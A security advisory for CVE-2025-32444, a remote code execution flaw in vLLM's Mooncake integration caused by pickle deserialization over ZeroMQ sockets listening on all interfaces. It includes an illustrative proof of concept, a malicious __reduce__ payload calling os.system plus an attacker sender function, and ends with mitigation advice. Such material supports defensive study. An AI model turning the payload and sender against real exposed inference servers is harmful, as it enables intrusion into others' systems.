CVE-2025-32444: vLLM Mooncake integration vulnerable to remote code execution via pickle over unsecured ZeroMQ sockets

vLLM is a high-throughput and memory-efficient inference and serving engine for LLMs. Versions starting from 0.6.5 and prior to 0.8.5, when the Mooncake integration is enabled, are vulnerable to remote code execution because pickle-based serialization is used over unsecured ZeroMQ sockets, and the affected sockets listen on all network interfaces, making them more likely to be reachable by an attacker. vLLM instances that do not use the Mooncake integration are not affected. The issue is fixed in version 0.8.5.
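To make the mechanism concrete, below is a minimal sketch of this vulnerability class. It is illustrative only, not vLLM's or Mooncake's actual code; the endpoint address, port, class name, and function names are all hypothetical. It shows why feeding bytes from an unauthenticated ZeroMQ socket straight into pickle.loads() amounts to remote code execution: during deserialization, pickle invokes the callable returned by an object's __reduce__ method.

```python
# Minimal sketch of the vulnerability class (NOT vLLM/Mooncake source code).
# Endpoint addresses, ports, and names here are hypothetical.
import os
import pickle

import zmq  # pip install pyzmq


class MaliciousPayload:
    """pickle calls __reduce__ when serializing; on pickle.loads() the
    returned callable is invoked with the given arguments, so an attacker
    controls what runs on the receiving host."""

    def __reduce__(self):
        # Benign stand-in; a real attacker would run an arbitrary command.
        return (os.system, ("echo code execution as $(whoami)",))


def attacker_send(endpoint: str = "tcp://victim-host:5555") -> None:
    """Attacker side: ship a malicious pickle over ZeroMQ."""
    ctx = zmq.Context.instance()
    sock = ctx.socket(zmq.PUSH)
    sock.connect(endpoint)
    sock.send(pickle.dumps(MaliciousPayload()))
    sock.close()


def vulnerable_receive(bind_addr: str = "tcp://*:5555") -> None:
    """Vulnerable pattern: a socket bound on all interfaces whose
    messages are deserialized with pickle."""
    ctx = zmq.Context.instance()
    sock = ctx.socket(zmq.PULL)
    sock.bind(bind_addr)      # reachable from any network interface
    data = sock.recv()
    obj = pickle.loads(data)  # arbitrary code runs HERE, during unpickling
    print("received:", obj)   # too late: the payload already executed
```

The durable defense against this class of bug is to never unpickle untrusted input: use a schema-validated format such as JSON or msgpack for cross-process messages, and bind sockets to localhost or an authenticated transport rather than all interfaces. For this CVE specifically, upgrading to vLLM 0.8.5 or later resolves the issue.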